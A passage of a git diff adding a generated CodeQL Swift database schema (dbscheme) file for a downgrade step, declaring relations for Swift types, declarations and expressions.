id: @pack_type ref, + int index: int ref, + int element: @type_or_none ref +); + +parameterized_protocol_types( //dir=type + unique int id: @parameterized_protocol_type, + int base: @protocol_type_or_none ref +); + +#keyset[id, index] +parameterized_protocol_type_args( //dir=type + int id: @parameterized_protocol_type ref, + int index: int ref, + int arg: @type_or_none ref +); + +protocol_composition_types( //dir=type + unique int id: @protocol_composition_type +); + +#keyset[id, index] +protocol_composition_type_members( //dir=type + int id: @protocol_composition_type ref, + int index: int ref, + int member: @type_or_none ref +); + +@reference_storage_type = + @unmanaged_storage_type +| @unowned_storage_type +| @weak_storage_type +; + +#keyset[id] +reference_storage_types( //dir=type + int id: @reference_storage_type ref, + int referent_type: @type_or_none ref +); + +@substitutable_type = + @archetype_type +| @generic_type_param_type +; + +@sugar_type = + @paren_type +| @syntax_sugar_type +| @type_alias_type +; + +tuple_types( //dir=type + unique int id: @tuple_type +); + +#keyset[id, index] +tuple_type_types( //dir=type + int id: @tuple_type ref, + int index: int ref, + int type_: @type_or_none ref +); + +#keyset[id, index] +tuple_type_names( //dir=type + int id: @tuple_type ref, + int index: int ref, + string name: string ref +); + +unresolved_types( //dir=type + unique int id: @unresolved_type +); + +@any_builtin_integer_type = + @builtin_integer_literal_type +| @builtin_integer_type +; + +@archetype_type = + @local_archetype_type +| @opaque_type_archetype_type +| @pack_archetype_type +| @primary_archetype_type +; + +#keyset[id] +archetype_types( //dir=type + int id: @archetype_type ref, + int interface_type: @type_or_none ref +); + +#keyset[id] +archetype_type_superclasses( //dir=type + int id: @archetype_type ref, + int superclass: @type_or_none ref +); + +#keyset[id, index] +archetype_type_protocols( //dir=type + int id: @archetype_type ref, + int index: int ref, + int protocol: @protocol_decl_or_none ref +); + +builtin_bridge_object_types( //dir=type + unique int id: @builtin_bridge_object_type +); + +builtin_default_actor_storage_types( //dir=type + unique int id: @builtin_default_actor_storage_type +); + +builtin_executor_types( //dir=type + unique int id: @builtin_executor_type +); + +builtin_float_types( //dir=type + unique int id: @builtin_float_type +); + +builtin_job_types( //dir=type + unique int id: @builtin_job_type +); + +builtin_native_object_types( //dir=type + unique int id: @builtin_native_object_type +); + +builtin_raw_pointer_types( //dir=type + unique int id: @builtin_raw_pointer_type +); + +builtin_raw_unsafe_continuation_types( //dir=type + unique int id: @builtin_raw_unsafe_continuation_type +); + +builtin_unsafe_value_buffer_types( //dir=type + unique int id: @builtin_unsafe_value_buffer_type +); + +builtin_vector_types( //dir=type + unique int id: @builtin_vector_type +); + +existential_metatype_types( //dir=type + unique int id: @existential_metatype_type +); + +function_types( //dir=type + unique int id: @function_type +); + +generic_function_types( //dir=type + unique int id: @generic_function_type +); + +#keyset[id, index] +generic_function_type_generic_params( //dir=type + int id: @generic_function_type ref, + int index: int ref, + int generic_param: @generic_type_param_type_or_none ref +); + +generic_type_param_types( //dir=type + unique int id: @generic_type_param_type +); + +metatype_types( //dir=type + unique int id: @metatype_type +); + +@nominal_or_bound_generic_nominal_type = + @bound_generic_type +| @nominal_type +; + +paren_types( //dir=type + unique int id: @paren_type, + int type_: @type_or_none ref +); + +@syntax_sugar_type = + @dictionary_type +| @unary_syntax_sugar_type +; + +type_alias_types( //dir=type + unique int id: @type_alias_type, + int decl: @type_alias_decl_or_none ref +); + +unbound_generic_types( //dir=type + unique int id: @unbound_generic_type +); + +unmanaged_storage_types( //dir=type + unique int id: @unmanaged_storage_type +); + +unowned_storage_types( //dir=type + unique int id: @unowned_storage_type +); + +weak_storage_types( //dir=type + unique int id: @weak_storage_type +); + +@bound_generic_type = + @bound_generic_class_type +| @bound_generic_enum_type +| @bound_generic_struct_type +; + +#keyset[id, index] +bound_generic_type_arg_types( //dir=type + int id: @bound_generic_type ref, + int index: int ref, + int arg_type: @type_or_none ref +); + +builtin_integer_literal_types( //dir=type + unique int id: @builtin_integer_literal_type +); + +builtin_integer_types( //dir=type + unique int id: @builtin_integer_type +); + +#keyset[id] +builtin_integer_type_widths( //dir=type + int id: @builtin_integer_type ref, + int width: int ref +); + +dictionary_types( //dir=type + unique int id: @dictionary_type, + int key_type: @type_or_none ref, + int value_type: @type_or_none ref +); + +@local_archetype_type = + @element_archetype_type +| @opened_archetype_type +; + +@nominal_type = + @class_type +| @enum_type +| @protocol_type +| @struct_type +; + +opaque_type_archetype_types( //dir=type + unique int id: @opaque_type_archetype_type, + int declaration: @opaque_type_decl_or_none ref +); + +pack_archetype_types( //dir=type + unique int id: @pack_archetype_type +); + +primary_archetype_types( //dir=type + unique int id: @primary_archetype_type +); + +@unary_syntax_sugar_type = + @array_slice_type +| @optional_type +| @variadic_sequence_type +; + +#keyset[id] +unary_syntax_sugar_types( //dir=type + int id: @unary_syntax_sugar_type ref, + int base_type: @type_or_none ref +); + +array_slice_types( //dir=type + unique int id: @array_slice_type +); + +bound_generic_class_types( //dir=type + unique int id: @bound_generic_class_type +); + +bound_generic_enum_types( //dir=type + unique int id: @bound_generic_enum_type +); + +bound_generic_struct_types( //dir=type + unique int id: @bound_generic_struct_type +); + +class_types( //dir=type + unique int id: @class_type +); + +element_archetype_types( //dir=type + unique int id: @element_archetype_type +); + +enum_types( //dir=type + unique int id: @enum_type +); + +opened_archetype_types( //dir=type + unique int id: @opened_archetype_type +); + +optional_types( //dir=type + unique int id: @optional_type +); + +protocol_types( //dir=type + unique int id: @protocol_type +); + +struct_types( //dir=type + unique int id: @struct_type +); + +variadic_sequence_types( //dir=type + unique int id: @variadic_sequence_type +); + +@accessor_or_none = + @accessor +| @unspecified_element +; + +@argument_or_none = + @argument +| @unspecified_element +; + +@associated_type_decl_or_none = + @associated_type_decl +| @unspecified_element +; + +@ast_node_or_none = + @ast_node +| @unspecified_element +; + +@availability_info_or_none = + @availability_info +| @unspecified_element +; + +@availability_spec_or_none = + @availability_spec +| @unspecified_element +; + +@brace_stmt_or_none = + @brace_stmt +| @unspecified_element +; + +@captured_decl_or_none = + @captured_decl +| @unspecified_element +; + +@case_label_item_or_none = + @case_label_item +| @unspecified_element +; + +@case_stmt_or_none = + @case_stmt +| @unspecified_element +; + +@closure_expr_or_none = + @closure_expr +| @unspecified_element +; + +@condition_element_or_none = + @condition_element +| @unspecified_element +; + +@decl_or_none = + @decl +| @unspecified_element +; + +@enum_element_decl_or_none = + @enum_element_decl +| @unspecified_element +; + +@expr_or_none = + @expr +| @unspecified_element +; + +@file_or_none = + @file +| @unspecified_element +; + +@function_or_none = + @function +| @unspecified_element +; + +@generic_type_decl_or_none = + @generic_type_decl +| @unspecified_element +; + +@generic_type_param_decl_or_none = + @generic_type_param_decl +| @unspecified_element +; + +@generic_type_param_type_or_none = + @generic_type_param_type +| @unspecified_element +; + +@initializer_or_none = + @initializer +| @unspecified_element +; + +@key_path_component_or_none = + @key_path_component +| @unspecified_element +; + +@location_or_none = + @location +| @unspecified_element +; + +@macro_role_or_none = + @macro_role +| @unspecified_element +; + +@module_decl_or_none = + @module_decl +| @unspecified_element +; + +@nominal_type_decl_or_none = + @nominal_type_decl +| @unspecified_element +; + +@opaque_type_decl_or_none = + @opaque_type_decl +| @unspecified_element +; + +@opaque_value_expr_or_none = + @opaque_value_expr +| @unspecified_element +; + +@param_decl_or_none = + @param_decl +| @unspecified_element +; + +@pattern_or_none = + @pattern +| @unspecified_element +; + +@pattern_binding_decl_or_none = + @pattern_binding_decl +| @unspecified_element +; + +@precedence_group_decl_or_none = + @precedence_group_decl +| @unspecified_element +; + +@protocol_decl_or_none = + @protocol_decl +| @unspecified_element +; + +@protocol_type_or_none = + @protocol_type +| @unspecified_element +; + +@stmt_or_none = + @stmt +| @unspecified_element +; + +@stmt_condition_or_none = + @stmt_condition +| @unspecified_element +; + +@string_literal_expr_or_none = + @string_literal_expr +| @unspecified_element +; + +@tap_expr_or_none = + @tap_expr +| @unspecified_element +; + +@type_or_none = + @type +| @unspecified_element +; + +@type_alias_decl_or_none = + @type_alias_decl +| @unspecified_element +; + +@type_expr_or_none = + @type_expr +| @unspecified_element +; + +@type_repr_or_none = + @type_repr +| @unspecified_element +; + +@value_decl_or_none = + @unspecified_element +| @value_decl +; + +@var_decl_or_none = + @unspecified_element +| @var_decl +; diff --git a/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/swift.dbscheme b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/swift.dbscheme new file mode 100644 index 00000000000..44c4818a898 --- /dev/null +++ b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/swift.dbscheme @@ -0,0 +1,2786 @@ +// generated by codegen/codegen.py, do not edit + +// from prefix.dbscheme +/** + * The source location of the snapshot. + */ +sourceLocationPrefix( + string prefix: string ref +); + + +// from schema.py + +@element = + @file +| @generic_context +| @locatable +| @location +| @type +; + +#keyset[id] +element_is_unknown( + int id: @element ref +); + +@file = + @db_file +; + +#keyset[id] +files( + int id: @file ref, + string name: string ref +); + +#keyset[id] +file_is_successfully_extracted( + int id: @file ref +); + +@locatable = + @argument +| @ast_node +| @comment +| @diagnostics +| @error_element +; + +#keyset[id] +locatable_locations( + int id: @locatable ref, + int location: @location_or_none ref +); + +@location = + @db_location +; + +#keyset[id] +locations( + int id: @location ref, + int file: @file_or_none ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +@ast_node = + @availability_info +| @availability_spec +| @callable +| @case_label_item +| @condition_element +| @decl +| @expr +| @key_path_component +| @macro_role +| @pattern +| @stmt +| @stmt_condition +| @type_repr +; + +comments( + unique int id: @comment, + string text: string ref +); + +db_files( + unique int id: @db_file +); + +db_locations( + unique int id: @db_location +); + +diagnostics( + unique int id: @diagnostics, + string text: string ref, + int kind: int ref +); + +@error_element = + @error_expr +| @error_type +| @overloaded_decl_ref_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_chain_result_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @unresolved_type +| @unresolved_type_conversion_expr +| @unspecified_element +; + +availability_infos( + unique int id: @availability_info +); + +#keyset[id] +availability_info_is_unavailable( + int id: @availability_info ref +); + +#keyset[id, index] +availability_info_specs( + int id: @availability_info ref, + int index: int ref, + int spec: @availability_spec_or_none ref +); + +@availability_spec = + @other_availability_spec +| @platform_version_availability_spec +; + +@callable = + @closure_expr +| @function +; + +#keyset[id] +callable_names( + int id: @callable ref, + string name: string ref +); + +#keyset[id] +callable_self_params( + int id: @callable ref, + int self_param: @param_decl_or_none ref +); + +#keyset[id, index] +callable_params( + int id: @callable ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +#keyset[id] +callable_bodies( + int id: @callable ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +callable_captures( + int id: @callable ref, + int index: int ref, + int capture: @captured_decl_or_none ref +); + +key_path_components( + unique int id: @key_path_component, + int kind: int ref, + int component_type: @type_or_none ref +); + +#keyset[id, index] +key_path_component_subscript_arguments( + int id: @key_path_component ref, + int index: int ref, + int subscript_argument: @argument_or_none ref +); + +#keyset[id] +key_path_component_tuple_indices( + int id: @key_path_component ref, + int tuple_index: int ref +); + +#keyset[id] +key_path_component_decl_refs( + int id: @key_path_component ref, + int decl_ref: @value_decl_or_none ref +); + +macro_roles( + unique int id: @macro_role, + int kind: int ref, + int macro_syntax: int ref +); + +#keyset[id, index] +macro_role_conformances( + int id: @macro_role ref, + int index: int ref, + int conformance: @type_expr_or_none ref +); + +#keyset[id, index] +macro_role_names( + int id: @macro_role ref, + int index: int ref, + string name: string ref +); + +unspecified_elements( + unique int id: @unspecified_element, + string property: string ref, + string error: string ref +); + +#keyset[id] +unspecified_element_parents( + int id: @unspecified_element ref, + int parent: @element ref +); + +#keyset[id] +unspecified_element_indices( + int id: @unspecified_element ref, + int index: int ref +); + +#keyset[id, index] +unspecified_element_children( + int id: @unspecified_element ref, + int index: int ref, + int child: @ast_node_or_none ref +); + +other_availability_specs( + unique int id: @other_availability_spec +); + +platform_version_availability_specs( + unique int id: @platform_version_availability_spec, + string platform: string ref, + string version: string ref +); + +@decl = + @captured_decl +| @enum_case_decl +| @extension_decl +| @if_config_decl +| @import_decl +| @missing_member_decl +| @operator_decl +| @pattern_binding_decl +| @pound_diagnostic_decl +| @precedence_group_decl +| @top_level_code_decl +| @value_decl +; + +#keyset[id] +decls( //dir=decl + int id: @decl ref, + int module: @module_decl_or_none ref +); + +#keyset[id, index] +decl_members( //dir=decl + int id: @decl ref, + int index: int ref, + int member: @decl_or_none ref +); + +@generic_context = + @extension_decl +| @function +| @generic_type_decl +| @macro_decl +| @subscript_decl +; + +#keyset[id, index] +generic_context_generic_type_params( //dir=decl + int id: @generic_context ref, + int index: int ref, + int generic_type_param: @generic_type_param_decl_or_none ref +); + +captured_decls( //dir=decl + unique int id: @captured_decl, + int decl: @value_decl_or_none ref +); + +#keyset[id] +captured_decl_is_direct( //dir=decl + int id: @captured_decl ref +); + +#keyset[id] +captured_decl_is_escaping( //dir=decl + int id: @captured_decl ref +); + +enum_case_decls( //dir=decl + unique int id: @enum_case_decl +); + +#keyset[id, index] +enum_case_decl_elements( //dir=decl + int id: @enum_case_decl ref, + int index: int ref, + int element: @enum_element_decl_or_none ref +); + +extension_decls( //dir=decl + unique int id: @extension_decl, + int extended_type_decl: @nominal_type_decl_or_none ref +); + +#keyset[id, index] +extension_decl_protocols( //dir=decl + int id: @extension_decl ref, + int index: int ref, + int protocol: @protocol_decl_or_none ref +); + +if_config_decls( //dir=decl + unique int id: @if_config_decl +); + +#keyset[id, index] +if_config_decl_active_elements( //dir=decl + int id: @if_config_decl ref, + int index: int ref, + int active_element: @ast_node_or_none ref +); + +import_decls( //dir=decl + unique int id: @import_decl +); + +#keyset[id] +import_decl_is_exported( //dir=decl + int id: @import_decl ref +); + +#keyset[id] +import_decl_imported_modules( //dir=decl + int id: @import_decl ref, + int imported_module: @module_decl_or_none ref +); + +#keyset[id, index] +import_decl_declarations( //dir=decl + int id: @import_decl ref, + int index: int ref, + int declaration: @value_decl_or_none ref +); + +missing_member_decls( //dir=decl + unique int id: @missing_member_decl, + string name: string ref +); + +@operator_decl = + @infix_operator_decl +| @postfix_operator_decl +| @prefix_operator_decl +; + +#keyset[id] +operator_decls( //dir=decl + int id: @operator_decl ref, + string name: string ref +); + +pattern_binding_decls( //dir=decl + unique int id: @pattern_binding_decl +); + +#keyset[id, index] +pattern_binding_decl_inits( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int init: @expr_or_none ref +); + +#keyset[id, index] +pattern_binding_decl_patterns( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int pattern: @pattern_or_none ref +); + +pound_diagnostic_decls( //dir=decl + unique int id: @pound_diagnostic_decl, + int kind: int ref, + int message: @string_literal_expr_or_none ref +); + +precedence_group_decls( //dir=decl + unique int id: @precedence_group_decl +); + +top_level_code_decls( //dir=decl + unique int id: @top_level_code_decl, + int body: @brace_stmt_or_none ref +); + +@value_decl = + @abstract_storage_decl +| @enum_element_decl +| @function +| @macro_decl +| @type_decl +; + +#keyset[id] +value_decls( //dir=decl + int id: @value_decl ref, + int interface_type: @type_or_none ref +); + +@abstract_storage_decl = + @subscript_decl +| @var_decl +; + +#keyset[id, index] +abstract_storage_decl_accessors( //dir=decl + int id: @abstract_storage_decl ref, + int index: int ref, + int accessor: @accessor_or_none ref +); + +enum_element_decls( //dir=decl + unique int id: @enum_element_decl, + string name: string ref +); + +#keyset[id, index] +enum_element_decl_params( //dir=decl + int id: @enum_element_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@function = + @accessor_or_named_function +| @deinitializer +| @initializer +; + +infix_operator_decls( //dir=decl + unique int id: @infix_operator_decl +); + +#keyset[id] +infix_operator_decl_precedence_groups( //dir=decl + int id: @infix_operator_decl ref, + int precedence_group: @precedence_group_decl_or_none ref +); + +macro_decls( //dir=decl + unique int id: @macro_decl, + string name: string ref +); + +#keyset[id, index] +macro_decl_parameters( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int parameter: @param_decl_or_none ref +); + +#keyset[id, index] +macro_decl_roles( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int role: @macro_role_or_none ref +); + +postfix_operator_decls( //dir=decl + unique int id: @postfix_operator_decl +); + +prefix_operator_decls( //dir=decl + unique int id: @prefix_operator_decl +); + +@type_decl = + @abstract_type_param_decl +| @generic_type_decl +| @module_decl +; + +#keyset[id] +type_decls( //dir=decl + int id: @type_decl ref, + string name: string ref +); + +#keyset[id, index] +type_decl_inherited_types( //dir=decl + int id: @type_decl ref, + int index: int ref, + int inherited_type: @type_or_none ref +); + +@abstract_type_param_decl = + @associated_type_decl +| @generic_type_param_decl +; + +@accessor_or_named_function = + @accessor +| @named_function +; + +deinitializers( //dir=decl + unique int id: @deinitializer +); + +@generic_type_decl = + @nominal_type_decl +| @opaque_type_decl +| @type_alias_decl +; + +initializers( //dir=decl + unique int id: @initializer +); + +module_decls( //dir=decl + unique int id: @module_decl +); + +#keyset[id] +module_decl_is_builtin_module( //dir=decl + int id: @module_decl ref +); + +#keyset[id] +module_decl_is_system_module( //dir=decl + int id: @module_decl ref +); + +module_decl_imported_modules( //dir=decl + int id: @module_decl ref, + int imported_module: @module_decl_or_none ref +); + +module_decl_exported_modules( //dir=decl + int id: @module_decl ref, + int exported_module: @module_decl_or_none ref +); + +subscript_decls( //dir=decl + unique int id: @subscript_decl, + int element_type: @type_or_none ref +); + +#keyset[id, index] +subscript_decl_params( //dir=decl + int id: @subscript_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@var_decl = + @concrete_var_decl +| @param_decl +; + +#keyset[id] +var_decls( //dir=decl + int id: @var_decl ref, + string name: string ref, + int type_: @type_or_none ref +); + +#keyset[id] +var_decl_attached_property_wrapper_types( //dir=decl + int id: @var_decl ref, + int attached_property_wrapper_type: @type_or_none ref +); + +#keyset[id] +var_decl_parent_patterns( //dir=decl + int id: @var_decl ref, + int parent_pattern: @pattern_or_none ref +); + +#keyset[id] +var_decl_parent_initializers( //dir=decl + int id: @var_decl ref, + int parent_initializer: @expr_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var: @var_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var: @var_decl_or_none ref +); + +accessors( //dir=decl + unique int id: @accessor +); + +#keyset[id] +accessor_is_getter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_setter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_will_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_did_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_read( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_modify( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_address( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_mutable_address( //dir=decl + int id: @accessor ref +); + +associated_type_decls( //dir=decl + unique int id: @associated_type_decl +); + +concrete_var_decls( //dir=decl + unique int id: @concrete_var_decl, + int introducer_int: int ref +); + +generic_type_param_decls( //dir=decl + unique int id: @generic_type_param_decl +); + +named_functions( //dir=decl + unique int id: @named_function +); + +@nominal_type_decl = + @class_decl +| @enum_decl +| @protocol_decl +| @struct_decl +; + +#keyset[id] +nominal_type_decls( //dir=decl + int id: @nominal_type_decl ref, + int type_: @type_or_none ref +); + +opaque_type_decls( //dir=decl + unique int id: @opaque_type_decl, + int naming_declaration: @value_decl_or_none ref +); + +#keyset[id, index] +opaque_type_decl_opaque_generic_params( //dir=decl + int id: @opaque_type_decl ref, + int index: int ref, + int opaque_generic_param: @generic_type_param_type_or_none ref +); + +param_decls( //dir=decl + unique int id: @param_decl +); + +#keyset[id] +param_decl_is_inout( //dir=decl + int id: @param_decl ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_var_bindings( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_vars( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var: @var_decl_or_none ref +); + +type_alias_decls( //dir=decl + unique int id: @type_alias_decl, + int aliased_type: @type_or_none ref +); + +class_decls( //dir=decl + unique int id: @class_decl +); + +enum_decls( //dir=decl + unique int id: @enum_decl +); + +protocol_decls( //dir=decl + unique int id: @protocol_decl +); + +struct_decls( //dir=decl + unique int id: @struct_decl +); + +arguments( //dir=expr + unique int id: @argument, + string label: string ref, + int expr: @expr_or_none ref +); + +@expr = + @any_try_expr +| @applied_property_wrapper_expr +| @apply_expr +| @assign_expr +| @bind_optional_expr +| @capture_list_expr +| @closure_expr +| @collection_expr +| @consume_expr +| @copy_expr +| @decl_ref_expr +| @default_argument_expr +| @discard_assignment_expr +| @dot_syntax_base_ignored_expr +| @dynamic_type_expr +| @enum_is_case_expr +| @error_expr +| @explicit_cast_expr +| @force_value_expr +| @identity_expr +| @if_expr +| @implicit_conversion_expr +| @in_out_expr +| @key_path_application_expr +| @key_path_dot_expr +| @key_path_expr +| @lazy_initialization_expr +| @literal_expr +| @lookup_expr +| @make_temporarily_escapable_expr +| @materialize_pack_expr +| @obj_c_selector_expr +| @one_way_expr +| @opaque_value_expr +| @open_existential_expr +| @optional_evaluation_expr +| @other_initializer_ref_expr +| @overloaded_decl_ref_expr +| @pack_element_expr +| @pack_expansion_expr +| @property_wrapper_value_placeholder_expr +| @rebind_self_in_initializer_expr +| @sequence_expr +| @single_value_stmt_expr +| @super_ref_expr +| @tap_expr +| @tuple_element_expr +| @tuple_expr +| @type_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @vararg_expansion_expr +; + +#keyset[id] +expr_types( //dir=expr + int id: @expr ref, + int type_: @type_or_none ref +); + +@any_try_expr = + @force_try_expr +| @optional_try_expr +| @try_expr +; + +#keyset[id] +any_try_exprs( //dir=expr + int id: @any_try_expr ref, + int sub_expr: @expr_or_none ref +); + +applied_property_wrapper_exprs( //dir=expr + unique int id: @applied_property_wrapper_expr, + int kind: int ref, + int value: @expr_or_none ref, + int param: @param_decl_or_none ref +); + +@apply_expr = + @binary_expr +| @call_expr +| @postfix_unary_expr +| @prefix_unary_expr +| @self_apply_expr +; + +#keyset[id] +apply_exprs( //dir=expr + int id: @apply_expr ref, + int function: @expr_or_none ref +); + +#keyset[id, index] +apply_expr_arguments( //dir=expr + int id: @apply_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +assign_exprs( //dir=expr + unique int id: @assign_expr, + int dest: @expr_or_none ref, + int source: @expr_or_none ref +); + +bind_optional_exprs( //dir=expr + unique int id: @bind_optional_expr, + int sub_expr: @expr_or_none ref +); + +capture_list_exprs( //dir=expr + unique int id: @capture_list_expr, + int closure_body: @closure_expr_or_none ref +); + +#keyset[id, index] +capture_list_expr_binding_decls( //dir=expr + int id: @capture_list_expr ref, + int index: int ref, + int binding_decl: @pattern_binding_decl_or_none ref +); + +@closure_expr = + @auto_closure_expr +| @explicit_closure_expr +; + +@collection_expr = + @array_expr +| @dictionary_expr +; + +consume_exprs( //dir=expr + unique int id: @consume_expr, + int sub_expr: @expr_or_none ref +); + +copy_exprs( //dir=expr + unique int id: @copy_expr, + int sub_expr: @expr_or_none ref +); + +decl_ref_exprs( //dir=expr + unique int id: @decl_ref_expr, + int decl: @decl_or_none ref +); + +#keyset[id, index] +decl_ref_expr_replacement_types( //dir=expr + int id: @decl_ref_expr ref, + int index: int ref, + int replacement_type: @type_or_none ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_ordinary_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +default_argument_exprs( //dir=expr + unique int id: @default_argument_expr, + int param_decl: @param_decl_or_none ref, + int param_index: int ref +); + +#keyset[id] +default_argument_expr_caller_side_defaults( //dir=expr + int id: @default_argument_expr ref, + int caller_side_default: @expr_or_none ref +); + +discard_assignment_exprs( //dir=expr + unique int id: @discard_assignment_expr +); + +dot_syntax_base_ignored_exprs( //dir=expr + unique int id: @dot_syntax_base_ignored_expr, + int qualifier: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +dynamic_type_exprs( //dir=expr + unique int id: @dynamic_type_expr, + int base: @expr_or_none ref +); + +enum_is_case_exprs( //dir=expr + unique int id: @enum_is_case_expr, + int sub_expr: @expr_or_none ref, + int element: @enum_element_decl_or_none ref +); + +error_exprs( //dir=expr + unique int id: @error_expr +); + +@explicit_cast_expr = + @checked_cast_expr +| @coerce_expr +; + +#keyset[id] +explicit_cast_exprs( //dir=expr + int id: @explicit_cast_expr ref, + int sub_expr: @expr_or_none ref +); + +force_value_exprs( //dir=expr + unique int id: @force_value_expr, + int sub_expr: @expr_or_none ref +); + +@identity_expr = + @await_expr +| @borrow_expr +| @dot_self_expr +| @paren_expr +| @unresolved_member_chain_result_expr +; + +#keyset[id] +identity_exprs( //dir=expr + int id: @identity_expr ref, + int sub_expr: @expr_or_none ref +); + +if_exprs( //dir=expr + unique int id: @if_expr, + int condition: @expr_or_none ref, + int then_expr: @expr_or_none ref, + int else_expr: @expr_or_none ref +); + +@implicit_conversion_expr = + @abi_safe_conversion_expr +| @any_hashable_erasure_expr +| @archetype_to_super_expr +| @array_to_pointer_expr +| @bridge_from_obj_c_expr +| @bridge_to_obj_c_expr +| @class_metatype_to_object_expr +| @collection_upcast_conversion_expr +| @conditional_bridge_from_obj_c_expr +| @covariant_function_conversion_expr +| @covariant_return_conversion_expr +| @derived_to_base_expr +| @destructure_tuple_expr +| @differentiable_function_expr +| @differentiable_function_extract_original_expr +| @erasure_expr +| @existential_metatype_to_object_expr +| @foreign_object_conversion_expr +| @function_conversion_expr +| @in_out_to_pointer_expr +| @inject_into_optional_expr +| @linear_function_expr +| @linear_function_extract_original_expr +| @linear_to_differentiable_function_expr +| @load_expr +| @metatype_conversion_expr +| @pointer_to_pointer_expr +| @protocol_metatype_to_object_expr +| @string_to_pointer_expr +| @underlying_to_opaque_expr +| @unevaluated_instance_expr +| @unresolved_type_conversion_expr +; + +#keyset[id] +implicit_conversion_exprs( //dir=expr + int id: @implicit_conversion_expr ref, + int sub_expr: @expr_or_none ref +); + +in_out_exprs( //dir=expr + unique int id: @in_out_expr, + int sub_expr: @expr_or_none ref +); + +key_path_application_exprs( //dir=expr + unique int id: @key_path_application_expr, + int base: @expr_or_none ref, + int key_path: @expr_or_none ref +); + +key_path_dot_exprs( //dir=expr + unique int id: @key_path_dot_expr +); + +key_path_exprs( //dir=expr + unique int id: @key_path_expr +); + +#keyset[id] +key_path_expr_roots( //dir=expr + int id: @key_path_expr ref, + int root: @type_repr_or_none ref +); + +#keyset[id, index] +key_path_expr_components( //dir=expr + int id: @key_path_expr ref, + int index: int ref, + int component: @key_path_component_or_none ref +); + +lazy_initialization_exprs( //dir=expr + unique int id: @lazy_initialization_expr, + int sub_expr: @expr_or_none ref +); + +@literal_expr = + @builtin_literal_expr +| @interpolated_string_literal_expr +| @nil_literal_expr +| @object_literal_expr +| @regex_literal_expr +; + +@lookup_expr = + @dynamic_lookup_expr +| @member_ref_expr +| @subscript_expr +; + +#keyset[id] +lookup_exprs( //dir=expr + int id: @lookup_expr ref, + int base: @expr_or_none ref +); + +#keyset[id] +lookup_expr_members( //dir=expr + int id: @lookup_expr ref, + int member: @decl_or_none ref +); + +make_temporarily_escapable_exprs( //dir=expr + unique int id: @make_temporarily_escapable_expr, + int escaping_closure: @opaque_value_expr_or_none ref, + int nonescaping_closure: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +materialize_pack_exprs( //dir=expr + unique int id: @materialize_pack_expr, + int sub_expr: @expr_or_none ref +); + +obj_c_selector_exprs( //dir=expr + unique int id: @obj_c_selector_expr, + int sub_expr: @expr_or_none ref, + int method: @function_or_none ref +); + +one_way_exprs( //dir=expr + unique int id: @one_way_expr, + int sub_expr: @expr_or_none ref +); + +opaque_value_exprs( //dir=expr + unique int id: @opaque_value_expr +); + +open_existential_exprs( //dir=expr + unique int id: @open_existential_expr, + int sub_expr: @expr_or_none ref, + int existential: @expr_or_none ref, + int opaque_expr: @opaque_value_expr_or_none ref +); + +optional_evaluation_exprs( //dir=expr + unique int id: @optional_evaluation_expr, + int sub_expr: @expr_or_none ref +); + +other_initializer_ref_exprs( //dir=expr + unique int id: @other_initializer_ref_expr, + int initializer: @initializer_or_none ref +); + +overloaded_decl_ref_exprs( //dir=expr + unique int id: @overloaded_decl_ref_expr +); + +#keyset[id, index] +overloaded_decl_ref_expr_possible_declarations( //dir=expr + int id: @overloaded_decl_ref_expr ref, + int index: int ref, + int possible_declaration: @value_decl_or_none ref +); + +pack_element_exprs( //dir=expr + unique int id: @pack_element_expr, + int sub_expr: @expr_or_none ref +); + +pack_expansion_exprs( //dir=expr + unique int id: @pack_expansion_expr, + int pattern_expr: @expr_or_none ref +); + 